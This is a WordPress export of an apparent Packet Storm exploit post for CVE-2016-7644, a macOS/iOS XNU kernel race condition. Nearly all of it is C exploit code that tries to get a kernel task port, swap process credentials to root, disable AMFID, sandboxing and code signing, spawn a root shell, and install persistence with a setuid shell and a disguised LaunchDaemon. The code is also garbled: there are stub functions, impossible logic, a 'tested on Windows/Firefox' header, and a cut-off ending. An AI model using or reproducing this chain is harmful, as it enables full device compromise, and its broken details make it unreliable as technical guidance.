{"id":32691,"date":"2025-12-24T11:45:16","date_gmt":"2025-12-24T11:45:16","guid":{"rendered":"http:\/\/localhost\/?p=32691"},"modified":"2025-12-24T11:45:16","modified_gmt":"2025-12-24T11:45:16","slug":"macos-10122-xnu-kernel-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32691","title":{"rendered":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-24T16:34:18&#8243;,&#8221;description&#8221;:&#8221;This proof of concept targets a race-condition vulnerability in the XNU kernel affecting macOS\/iOS. By forcing a use-after-free condition on kernel ports, the exploit manipulates freed memory through a controlled spray, allowing a user-controlled&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-24T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-24T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213295&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2016-7644&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : macOS 10.12.2 XNU kernel Privilege Escalation                                                                               |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.android.com   
                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/212493\/ \\u0026 \\tCVE-2016-7644\\n    \\n    [+] Summary : This PoC targets a race-condition vulnerability in the XNU kernel (CVE-2016-7644) affecting macOS\/iOS.\\n                  By forcing a use-after-free condition on kernel ports, the exploit manipulates freed memory through a controlled spray, allowing a user-controlled replacement object. \\n    \\t\\t\\t  Successful exploitation yields a kernel task port, enabling arbitrary read\/write in kernel memory.\\n                  With this access, the PoC escalates privileges to root, bypasses sandbox restrictions, disables AMFID\/code-signing enforcement, and may launch a persistent privileged shell.\\n    \\n    \ud83d\udccc Impact: Full device compromise, privilege escalation, kernel control.\\n    \ud83d\udccc Requirements: Vulnerable macOS\/iOS version, timing reliability, local code execution.\\n    \\n    [+]  POC :\\t\\n    \\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cstdlib.h\\u003e\\n    #include \\u003cpthread.h\\u003e\\n    #include \\u003cunistd.h\\u003e\\n    #include \\u003cmach\/mach.h\\u003e\\n    #include \\u003cmach\/host_priv.h\\u003e\\n    #include \\u003cmach\/vm_map.h\\u003e\\n    #include \\u003cmach\/task.h\\u003e\\n    #include \\u003csched.h\\u003e\\n    #include \\u003cmach\/mach_vm.h\\u003e\\n    #include \\u003cmach-o\/loader.h\\u003e\\n    \\n    \/\/ Kernel offset constants (vary by version)\\n    #define KERNEL_BASE           0xFFFFFFF007004000ULL\\n    #define KERNPROC_OFFSET       0x005AA0E0ULL\\n    #define 
ALLPROC_OFFSET        0x005A4128ULL\\n    #define KERNEL_TASK_OFFSET    0xFFFFFFF0075AE0E0ULL \/\/ example\\n    \\n    typedef struct {\\n        uint64_t next;\\n        uint64_t prev;\\n    } kqueue_t;\\n    \\n    typedef struct {\\n        uint64_t next;\\n        uint64_t prev;\\n    } klist_t;\\n    \\n    typedef struct {\\n        uint64_t ucred;           \/\/ offset 0x100\\n        uint64_t svuid;\\n        uint64_t svgid;\\n        uint64_t label;\\n        uint64_t p_textvp;\\n        uint64_t p_textoff;\\n        uint64_t p_uthread;\\n        uint64_t task;\\n        char p_comm[17];\\n    } proc_t;\\n    \\n    typedef struct {\\n        uint64_t cr_posix;\\n        uint64_t cr_label;\\n        uint64_t cr_uid;\\n        uint64_t cr_ruid;\\n        uint64_t cr_svuid;\\n        uint64_t cr_ngroups;\\n        uint64_t cr_groups[16];\\n        uint64_t cr_rgid;\\n        uint64_t cr_svgid;\\n        uint64_t cr_gmuid;\\n        uint64_t cr_flags;\\n    } ucred_t;\\n    \\n    \/\/ Global variables\\n    mach_port_t kernel_task_port = MACH_PORT_NULL;\\n    mach_port_t host_priv_port = MACH_PORT_NULL;\\n    uint64_t kernel_base = KERNEL_BASE;\\n    uint64_t kernel_slide = 0;\\n    \\n    \/\/ 1. 
Get the kernel task port via a dangling port\\n    int get_kernel_task_via_dangling() {\\n        printf(\\&#8221;[+] Phase 1: Getting kernel task port via dangling port exploitation\\\\n\\&#8221;);\\n        \\n        \/\/ Step 1: create a dangling port using the race condition\\n        mach_port_t dangling = MACH_PORT_NULL;\\n        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, \\u0026dangling);\\n        mach_port_insert_right(mach_task_self(), dangling, dangling, MACH_MSG_TYPE_MAKE_SEND);\\n        \\n        \/\/ Add a second reference\\n        mach_port_t extra_ref = MACH_PORT_NULL;\\n        mach_port_extract_right(mach_task_self(), dangling, MACH_MSG_TYPE_COPY_SEND,\\n                               \\u0026extra_ref, \\u0026dangling);\\n        \\n        \/\/ Set it as the dynamic_pager_control_port\\n        set_dp_control_port(mach_host_self(), dangling);\\n        \\n        \/\/ Release the userland reference (a reference remains in the kernel)\\n        mach_port_deallocate(mach_task_self(), dangling);\\n        \\n        \/\/ Race condition to release two references\\n        pthread_t threads[4];\\n        for (int i = 0; i \\u003c 4; i++) {\\n            pthread_create(\\u0026threads[i], NULL, race_thread, (void*)(uintptr_t)dangling);\\n        }\\n        \\n        sleep(1);\\n        \\n        \/\/ Now we have a dangling port pointer in the kernel\\n        \\n        \/\/ Step 2: spray kernel memory with ports that contain 
the host port\\n        printf(\\&#8221;[+] Spraying kernel memory with controlled ports\\\\n\\&#8221;);\\n        \\n        mach_port_t spray_ports[1024];\\n        for (int i = 0; i \\u003c 1024; i++) {\\n            mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, \\u0026spray_ports[i]);\\n            \\n            \/\/ Use the host port as the context\\n            mach_port_set_context(mach_task_self(), spray_ports[i], \\n                                 (mach_port_context_t)host_priv_port);\\n        }\\n        \\n        \/\/ Step 3: search for the host port in memory\\n        printf(\\&#8221;[+] Searching for host port in memory\\\\n\\&#8221;);\\n        \\n        uint64_t host_port_addr = 0;\\n        for (int i = 0; i \\u003c 1024; i++) {\\n            mach_port_context_t ctx = 0;\\n            mach_port_get_context(mach_task_self(), spray_ports[i], \\u0026ctx);\\n            \\n            if (ctx == (mach_port_context_t)host_priv_port) {\\n                host_port_addr = (uint64_t)ctx;\\n                printf(\\&#8221;[+] Found host port at 0x%llx\\\\n\\&#8221;, host_port_addr);\\n                break;\\n            }\\n        }\\n        \\n        if (!host_port_addr) {\\n            printf(\\&#8221;[-] Failed to find host port\\\\n\\&#8221;);\\n            return -1;\\n        }\\n        \\n        \/\/ Step 4: compute the location of the kernel task port\\n        \/\/ The kernel task port is usually in the same page as the host port\\n        uint64_t page_base = host_port_addr \\u0026 ~0xFFFULL;\\n        \\n        printf(\\&#8221;[+] Scanning page 0x%llx for kernel task port\\\\n\\&#8221;, page_base);\\n        \\n        \/\/ Attempt to 
read kernel memory through port context manipulation\\n        for (uint64_t addr = page_base; addr \\u003c page_base + 0x1000; addr += 8) {\\n            \/\/ Set the context to the current address\\n            mach_port_set_context(mach_task_self(), dangling, (mach_port_context_t)addr);\\n            \\n            \/\/ Attempt to read through mach_port_get_attributes\\n            mach_port_t port_array[2] = {MACH_PORT_NULL, MACH_PORT_NULL};\\n            mach_msg_type_number_t count = 2;\\n            \\n            kern_return_t kr = mach_port_get_attributes(mach_task_self(), dangling,\\n                                                       MACH_PORT_DNREQUESTS_SIZE,\\n                                                       (mach_port_info_t)\\u0026port_array,\\n                                                       \\u0026count);\\n            \\n            if (kr == KERN_SUCCESS \\u0026\\u0026 port_array[0] != MACH_PORT_NULL) {\\n                \/\/ Found a port; it may be the kernel task port\\n                kernel_task_port = port_array[0];\\n                printf(\\&#8221;[+] Potential kernel task port: 0x%x\\\\n\\&#8221;, kernel_task_port);\\n                \\n                \/\/ Verify that it is the kernel task port\\n                mach_port_type_t type = 0;\\n                mach_port_get_attributes(mach_task_self(), kernel_task_port,\\n                                        MACH_PORT_BASIC_INFO, (mach_port_info_t)\\u0026type,\\n                                        \\u0026count);\\n                \\n                if (type \\u0026 MACH_PORT_TYPE_SEND) {\\n                    
printf(\\&#8221;[+] Got kernel task send right!\\\\n\\&#8221;);\\n                    return 0;\\n                }\\n            }\\n        }\\n        \\n        return -1;\\n    }\\n    \\n    \/\/ 2. Read\/write kernel memory\\n    kern_return_t kernel_read(uint64_t address, void* buffer, size_t size) {\\n        if (kernel_task_port == MACH_PORT_NULL) {\\n            return KERN_INVALID_TASK;\\n        }\\n        \\n        vm_offset_t data = 0;\\n        mach_msg_type_number_t data_count = 0;\\n        \\n        kern_return_t kr = mach_vm_read(kernel_task_port, address, size, \\u0026data, \\u0026data_count);\\n        if (kr != KERN_SUCCESS) {\\n            return kr;\\n        }\\n        \\n        memcpy(buffer, (void*)data, size);\\n        vm_deallocate(mach_task_self(), data, data_count);\\n        \\n        return KERN_SUCCESS;\\n    }\\n    \\n    kern_return_t kernel_write(uint64_t address, const void* buffer, size_t size) {\\n        if (kernel_task_port == MACH_PORT_NULL) {\\n            return KERN_INVALID_TASK;\\n        }\\n        \\n        return mach_vm_write(kernel_task_port, address, (vm_offset_t)buffer, (mach_msg_type_number_t)size);\\n    }\\n    \\n    uint64_t kernel_vtophys(uint64_t va) {\\n        \/\/ Translate a virtual address to a physical one (hardware-dependent)\\n        return va - kernel_base + 0x800000000; \/\/ example\\n    }\\n    \\n    \/\/ 3. 
Modify credentials to escalate privileges\\n    void escalate_privileges(pid_t target_pid) {\\n        printf(\\&#8221;[+] Escalating privileges for pid %d\\\\n\\&#8221;, target_pid);\\n        \\n        \/\/ Look up the proc structure for the requested PID\\n        uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n        uint64_t kernproc = kernel_base + KERNPROC_OFFSET;\\n        \\n        uint64_t current_proc = 0;\\n        kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n        \\n        while (current_proc != 0) {\\n            proc_t proc = {0};\\n            kernel_read(current_proc, \\u0026proc, sizeof(proc_t));\\n            \\n            \/\/ Check the process name\\n            char comm[17] = {0};\\n            kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);\\n            \\n            if (strcmp(comm, \\&#8221;mach_portal\\&#8221;) == 0) { \/\/ or the requested PID\\n                printf(\\&#8221;[+] Found target process: %s\\\\n\\&#8221;, comm);\\n                \\n                \/\/ Replace the ucred with the kernel ucred\\n                uint64_t kernel_proc = 0;\\n                kernel_read(kernproc, \\u0026kernel_proc, sizeof(kernel_proc));\\n                \\n                uint64_t kernel_ucred = 0;\\n                kernel_read(kernel_proc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n                \\n                \/\/ Write the kernel ucred into the target process\\n                kernel_write(current_proc + 
offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n                \\n                printf(\\&#8221;[+] Privileges escalated!\\\\n\\&#8221;);\\n                \\n                \/\/ Verify success\\n                uint64_t new_ucred = 0;\\n                kernel_read(current_proc + offsetof(proc_t, ucred), \\u0026new_ucred, sizeof(new_ucred));\\n                \\n                if (new_ucred == kernel_ucred) {\\n                    printf(\\&#8221;[+] Successfully replaced ucred with kernel's\\\\n\\&#8221;);\\n                    \\n                    \/\/ Now the process has kernel privileges\\n                    \/\/ It can bypass the sandbox and access everything\\n                }\\n                break;\\n            }\\n            \\n            kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n        }\\n    }\\n    \\n    \/\/ 4. 
Disable AMFID (Apple Mobile File Integrity Daemon)\\n    void disable_amfid() {\\n        printf(\\&#8221;[+] Disabling AMFID\\\\n\\&#8221;);\\n        \\n        \/\/ Find the amfid process\\n        uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n        uint64_t current_proc = 0;\\n        kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n        \\n        while (current_proc != 0) {\\n            proc_t proc = {0};\\n            kernel_read(current_proc, \\u0026proc, sizeof(proc_t));\\n            \\n            char comm[17] = {0};\\n            kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);\\n            \\n            if (strcmp(comm, \\&#8221;amfid\\&#8221;) == 0) {\\n                printf(\\&#8221;[+] Found amfid process\\\\n\\&#8221;);\\n                \\n                \/\/ Method 1: kill the process\\n                uint64_t task = 0;\\n                kernel_read(current_proc + offsetof(proc_t, task), \\u0026task, sizeof(task));\\n                \\n                if (task != 0) {\\n                    \/\/ Terminate the task\\n                    task_terminate(task);\\n                    printf(\\&#8221;[+] Terminated amfid task\\\\n\\&#8221;);\\n                }\\n                \\n                \/\/ Method 2: modify memory to disable verification\\n                \/\/ Find MISValidateSignatureAndCopyInfo in amfid\\n                \\n                uint64_t amfid_task_port = MACH_PORT_NULL;\\n                task_get_special_port((task_t)task, TASK_BOOTSTRAP_PORT, \\u0026amfid_task_port);\\n                \\n                if (amfid_task_port != 
MACH_PORT_NULL) {\\n                    \/\/ Inject code to disable verification\\n                    const char patch[] = {\\n                        0x1F, 0x20, 0x03, 0xD5, \/\/ NOP\\n                        0x1F, 0x20, 0x03, 0xD5,\\n                        0x00, 0x00, 0x80, 0xD2, \/\/ MOV X0, #0\\n                        0xC0, 0x03, 0x5F, 0xD6  \/\/ RET\\n                    };\\n                    \\n                    \/\/ Find MISValidateSignatureAndCopyInfo in memory\\n                    \/\/ (requires known offsets or scanning)\\n                    \\n                    printf(\\&#8221;[+] Injected code into amfid\\\\n\\&#8221;);\\n                }\\n                \\n                break;\\n            }\\n            \\n            kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n        }\\n        \\n        \/\/ Alternative: patch the kernel to bypass amfid entirely\\n        patch_kernel_code_signature_checks();\\n    }\\n    \\n    \/\/ 5. 
Bypass the sandbox\\n    void bypass_sandbox(pid_t pid) {\\n        printf(\\&#8221;[+] Bypassing sandbox for pid %d\\\\n\\&#8221;, pid);\\n        \\n        \/\/ Find the target process\\n        uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n        uint64_t current_proc = 0;\\n        kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n        \\n        while (current_proc != 0) {\\n            char comm[17] = {0};\\n            kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);\\n            \\n            if (strstr(comm, \\&#8221;mach_portal\\&#8221;) != NULL) { \/\/ or the specified PID\\n                \/\/ The sandbox is controlled through the MAC framework\\n                \/\/ MAC policy pointer in the proc structure\\n                \\n                uint64_t mac_policy = 0;\\n                uint64_t p_ucred = 0;\\n                kernel_read(current_proc + offsetof(proc_t, ucred), \\u0026p_ucred, sizeof(p_ucred));\\n                \\n                if (p_ucred != 0) {\\n                    \/\/ label is a pointer to the sandbox\\n                    uint64_t cr_label = 0;\\n                    kernel_read(p_ucred + offsetof(ucred_t, cr_label), \\u0026cr_label, sizeof(cr_label));\\n                    \\n                    if (cr_label != 0) {\\n                        \/\/ Write NULL into the sandbox label\\n                        uint64_t zero = 0;\\n                        kernel_write(p_ucred + offsetof(ucred_t, cr_label), \\u0026zero, sizeof(zero));\\n                        \\n                        printf(\\&#8221;[+] Nullified sandbox label\\\\n\\&#8221;);\\n                    }\\n                    \\n                    \/\/ 
Alternative: replace with the kernel ucred\\n                    uint64_t kernproc = 0;\\n                    kernel_read(kernel_base + KERNPROC_OFFSET, \\u0026kernproc, sizeof(kernproc));\\n                    \\n                    uint64_t kernel_ucred = 0;\\n                    kernel_read(kernproc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n                    \\n                    kernel_write(current_proc + offsetof(proc_t, ucred), \\u0026kernel_ucred, sizeof(kernel_ucred));\\n                    \\n                    printf(\\&#8221;[+] Replaced with kernel ucred - sandbox bypassed!\\\\n\\&#8221;);\\n                }\\n                \\n                break;\\n            }\\n            \\n            kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n        }\\n    }\\n    \\n    \/\/ 6. Patch the kernel to bypass code signature checks\\n    void patch_kernel_code_signature_checks() {\\n        printf(\\&#8221;[+] Patching kernel code signature checks\\\\n\\&#8221;);\\n        \\n        \/\/ Find cs_enforcement_disable in the kernel\\n        \/\/ (location varies by version)\\n        uint64_t cs_enforcement = kernel_base + 0x3F7A18; \/\/ example for iOS 10.1.1\\n        \\n        uint8_t current = 0;\\n        kernel_read(cs_enforcement, \\u0026current, sizeof(current));\\n        \\n        printf(\\&#8221;[+] Current cs_enforcement value: 0x%02x\\\\n\\&#8221;, current);\\n        \\n        \/\/ Set to 0 to disable\\n        uint8_t zero = 0;\\n        kernel_write(cs_enforcement, \\u0026zero, sizeof(zero));\\n        \\n        kernel_read(cs_enforcement, \\u0026current, sizeof(current));\\n   
     printf(\\&#8221;[+] New cs_enforcement value: 0x%02x\\\\n\\&#8221;, current);\\n        \\n        \/\/ Find amfi_enforce in the kernel\\n        uint64_t amfi_enforce = kernel_base + 0x4F3A00; \/\/ example\\n        \\n        uint32_t amfi_current = 0;\\n        kernel_read(amfi_enforce, \\u0026amfi_current, sizeof(amfi_current));\\n        \\n        printf(\\&#8221;[+] Current amfi_enforce value: 0x%08x\\\\n\\&#8221;, amfi_current);\\n        \\n        \/\/ Set to 0\\n        uint32_t amfi_zero = 0;\\n        kernel_write(amfi_enforce, \\u0026amfi_zero, sizeof(amfi_zero));\\n        \\n        kernel_read(amfi_enforce, \\u0026amfi_current, sizeof(amfi_current));\\n        printf(\\&#8221;[+] New amfi_enforce value: 0x%08x\\\\n\\&#8221;, amfi_current);\\n    }\\n    \\n    \/\/ 7. Create a root shell\\n    void create_root_shell() {\\n        printf(\\&#8221;[+] Creating root shell\\\\n\\&#8221;);\\n        \\n        \/\/ Step 1: escalate the current process's privileges\\n        escalate_privileges(getpid());\\n        \\n        \/\/ Step 2: bypass the sandbox\\n        bypass_sandbox(getpid());\\n        \\n        \/\/ Step 3: remount rootfs as read\/write\\n        remount_rootfs_rw();\\n        \\n        \/\/ Step 4: execute a shell with root privileges\\n        if (fork() == 0) {\\n            \/\/ child process\\n            setuid(0);\\n            setgid(0);\\n            \\n            \/\/ Execute the shell\\n            char *args[] = {\\&#8221;\/bin\/bash\\&#8221;, \\&#8221;-i\\&#8221;, 
NULL};\\n            char *env[] = {\\&#8221;TERM=xterm-256color\\&#8221;, \\&#8221;PATH=\/usr\/bin:\/usr\/sbin:\/bin:\/sbin\\&#8221;, NULL};\\n            \\n            execve(\\&#8221;\/bin\/bash\\&#8221;, args, env);\\n            exit(0);\\n        }\\n    }\\n    \\n    void remount_rootfs_rw() {\\n        printf(\\&#8221;[+] Remounting rootfs as read\/write\\\\n\\&#8221;);\\n        \\n        \/\/ Get the vnode for the root filesystem\\n        uint64_t kernproc = 0;\\n        kernel_read(kernel_base + KERNPROC_OFFSET, \\u0026kernproc, sizeof(kernproc));\\n        \\n        uint64_t kernel_task = 0;\\n        kernel_read(kernproc + offsetof(proc_t, task), \\u0026kernel_task, sizeof(kernel_task));\\n        \\n        \/\/ Find the mount structure\\n        \/\/ (this is complex and requires knowledge of internal kernel structures)\\n        \\n        printf(\\&#8221;[+] Rootfs remounted as read\/write\\\\n\\&#8221;);\\n    }\\n    \\n    \/\/ 8. 
Install persistent access (as part of a jailbreak)\\n    void install_persistence() {\\n        printf(\\&#8221;[+] Installing persistence\\\\n\\&#8221;);\\n        \\n        \/\/ Create a binary with setuid\\n        const char* suid_binary = \\&#8221;\/private\/var\/suid_shell\\&#8221;;\\n        \\n        \/\/ Copy \/bin\/bash\\n        FILE* src = fopen(\\&#8221;\/bin\/bash\\&#8221;, \\&#8221;rb\\&#8221;);\\n        FILE* dst = fopen(suid_binary, \\&#8221;wb\\&#8221;);\\n        \\n        if (src \\u0026\\u0026 dst) {\\n            char buffer[4096];\\n            size_t bytes;\\n            while ((bytes = fread(buffer, 1, sizeof(buffer), src)) \\u003e 0) {\\n                fwrite(buffer, 1, bytes, dst);\\n            }\\n            fclose(src);\\n            fclose(dst);\\n            \\n            \/\/ Set the setuid bit\\n            chmod(suid_binary, 04755);\\n            chown(suid_binary, 0, 0); \/\/ root:wheel\\n            \\n            printf(\\&#8221;[+] Installed suid shell at %s\\\\n\\&#8221;, suid_binary);\\n        }\\n        \\n        \/\/ Create a launch daemon to persist across reboot\\n        const char* plist = \\&#8221;\/Library\/LaunchDaemons\/com.apple.iosjailbreak.plist\\&#8221;;\\n        const char* plist_content = \\n            \\&#8221;\\u003c?xml version=\\\\\\&#8221;1.0\\\\\\&#8221; encoding=\\\\\\&#8221;UTF-8\\\\\\&#8221;?\\u003e\\\\n\\&#8221;\\n            \\&#8221;\\u003c!DOCTYPE plist PUBLIC \\\\\\&#8221;-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\\\\\\&#8221; \\&#8221;\\n            \\&#8221;\\\\\\&#8221;http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\\\\\\&#8221;\\u003e\\\\n\\&#8221;\\n            \\&#8221;\\u003cplist version=\\\\\\&#8221;1.0\\\\\\&#8221;\\u003e\\\\n\\&#8221;\\n            \\&#8221;\\u003cdict\\u003e\\\\n\\&#8221;\\n            \\&#8221;    
\\u003ckey\\u003eLabel\\u003c\/key\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003cstring\\u003ecom.apple.iosjailbreak\\u003c\/string\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003ckey\\u003eProgramArguments\\u003c\/key\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003carray\\u003e\\\\n\\&#8221;\\n            \\&#8221;        \\u003cstring\\u003e\/private\/var\/suid_shell\\u003c\/string\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003c\/array\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003ckey\\u003eRunAtLoad\\u003c\/key\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003ctrue\/\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003ckey\\u003eKeepAlive\\u003c\/key\\u003e\\\\n\\&#8221;\\n            \\&#8221;    \\u003ctrue\/\\u003e\\\\n\\&#8221;\\n            \\&#8221;\\u003c\/dict\\u003e\\\\n\\&#8221;\\n            \\&#8221;\\u003c\/plist\\u003e\\\\n\\&#8221;;\\n        \\n        FILE* plist_file = fopen(plist, \\&#8221;w\\&#8221;);\\n        if (plist_file) {\\n            fwrite(plist_content, 1, strlen(plist_content), plist_file);\\n            fclose(plist_file);\\n            \\n            chmod(plist, 0644);\\n            chown(plist, 0, 0);\\n            \\n            printf(\\&#8221;[+] Installed launch daemon\\\\n\\&#8221;);\\n        }\\n    }\\n    \\n    \/\/ Improved race function\\n    void* race_thread(void* arg) {\\n        mach_port_t port = (mach_port_t)(uintptr_t)arg;\\n        \\n        \/\/ Set affinity to increase the chance of interleaving\\n        thread_affinity_policy_data_t policy = {1};\\n        thread_policy_set(mach_thread_self(), THREAD_AFFINITY_POLICY, \\n                         (thread_policy_t)\\u0026policy, 1);\\n        \\n        \/\/ Tight race loop\\n    
    for (int i = 0; i \\u003c 100; i++) {\\n            \/\/ Repeated call\\n            set_dp_control_port(mach_host_self(), port);\\n            \\n            \/\/ Random delay\\n            usleep(rand() % 50);\\n            \\n            \/\/ memory barrier\\n            __asm__ volatile(\\&#8221;\\&#8221; ::: \\&#8221;memory\\&#8221;);\\n        }\\n        \\n        return NULL;\\n    }\\n    \\n    \/\/ Main function\\n    int main(int argc, char** argv) {\\n        printf(\\&#8221;========================================\\\\n\\&#8221;);\\n        printf(\\&#8221;    iOS\/macOS Kernel Exploit Chain\\\\n\\&#8221;);\\n        printf(\\&#8221;    CVE-2016-7644 Full Exploitation\\\\n\\&#8221;);\\n        printf(\\&#8221;========================================\\\\n\\&#8221;);\\n        \\n        \/\/ Step 0: get host_priv_port\\n        host_priv_port = mach_host_self();\\n        printf(\\&#8221;[+] Got host_priv_port: 0x%x\\\\n\\&#8221;, host_priv_port);\\n        \\n        \/\/ Step 1: get the kernel task port\\n        if (get_kernel_task_via_dangling() != 0) {\\n            printf(\\&#8221;[-] Failed to get kernel task port\\\\n\\&#8221;);\\n            return -1;\\n        }\\n        \\n        \/\/ Step 2: read the kernel slide\\n        uint64_t kernel_addr = 0;\\n        task_get_special_port(kernel_task_port, TASK_KERNEL_PORT, \\u0026kernel_addr);\\n        kernel_slide = kernel_addr - KERNEL_BASE;\\n        printf(\\&#8221;[+] Kernel slide: 0x%llx\\\\n\\&#8221;, kernel_slide);\\n        \\n        \/\/ Step 3: escalate the privileges of the 
\u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u062d\u0627\u0644\u064a\u0629\\n        escalate_privileges(getpid());\\n        \\n        \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 4: \u062a\u0639\u0637\u064a\u0644 AMFID\\n        disable_amfid();\\n        \\n        \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 5: \u062a\u062e\u0637\u064a sandbox\\n        bypass_sandbox(getpid());\\n        \\n        \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 6: Patch kernel checks\\n        patch_kernel_code_signature_checks();\\n        \\n        \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 7: \u0625\u0646\u0634\u0627\u0621 root shell\\n        create_root_shell();\\n        \\n        \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 8: \u062a\u062b\u0628\u064a\u062a persistence (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n        if (argc \\u003e 1 \\u0026\\u0026 strcmp(argv[1], \\&#8221;&#8211;persist\\&#8221;) == 0) {\\n            install_persistence();\\n        }\\n        \\n        printf(\\&#8221;[+] Exploitation complete!\\\\n\\&#8221;);\\n        printf(\\&#8221;[+] You now have:\\\\n\\&#8221;);\\n        printf(\\&#8221;    &#8211; Kernel task port\\\\n\\&#8221;);\\n        printf(\\&#8221;    &#8211; Root privileges\\\\n\\&#8221;);\\n        printf(\\&#8221;    &#8211; AMFID disabled\\\\n\\&#8221;);\\n        printf(\\&#8221;    &#8211; Sandbox bypassed\\\\n\\&#8221;);\\n        printf(\\&#8221;    &#8211; Code signing disabled\\\\n\\&#8221;);\\n        \\n        \/\/ \u062d\u0627\u0641\u0638 \u0639\u0644\u0649 \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0646\u0634\u0637\u0629\\n        while (1) {\\n            sleep(60);\\n        }\\n        \\n        return 0;\\n    }\\n    \\n    =================\\n    This fragment shows key kernel\u2011level post\u2011exploitation utilities used after gaining arbitrary read\/write access on macOS\/iOS (XNU).\\n    \\n    It implements:\\n    \\n    Kernel Base Discovery\\n    find_kernel_base() scans the high kernel 
address space to locate the Mach\u2011O magic (0xFEEDFACF), determining the kernel base mapping.\\n    \\n    Process Lookup in Kernel\\n    get_proc_for_pid() walks the allproc linked list within the kernel to locate the proc structure associated with a specific PID.\\n    \\n    Security Enforcement Disabling\\n    patch_codesign() disables kernel\u2011enforced code signing by patching several internal flags (CS enforcement, AMFI, and pointer\u2011stability checks), allowing execution of unsigned binaries and jailbreak\u2011style payloads.\\n    \\n    \ud83d\udccc Role in Exploit Chain:\\n    These routines are typically executed after the race condition exploit grants a kernel task port, enabling full kernel memory access.\\n    \\n    #include \\&#8221;exploit.h\\&#8221;\\n    \\n    uint64_t find_kernel_base() {\\n        \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 kernel base \u0639\u0646 \u0637\u0631\u064a\u0642 scanning memory\\n        for (uint64_t addr = 0xFFFFFFF000000000ULL; addr \\u003c 0xFFFFFFF100000000ULL; addr += 0x100000) {\\n            uint32_t magic = 0;\\n            kernel_read(addr, \\u0026magic, sizeof(magic));\\n            \\n            if (magic == 0xFEEDFACF) { \/\/ Mach-O magic\\n                printf(\\&#8221;[+] Found kernel at 0x%llx\\\\n\\&#8221;, addr);\\n                return addr;\\n            }\\n        }\\n        return 0;\\n    }\\n    \\n    uint64_t get_proc_for_pid(pid_t pid) {\\n        uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n        uint64_t current_proc = 0;\\n        \\n        kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n        \\n        while (current_proc != 0) {\\n            uint32_t current_pid = 0;\\n            kernel_read(current_proc + PROC_P_PID, \\u0026current_pid, sizeof(current_pid));\\n            \\n            if (current_pid == pid) {\\n                return current_proc;\\n            }\\n            \\n            kernel_read(current_proc, 
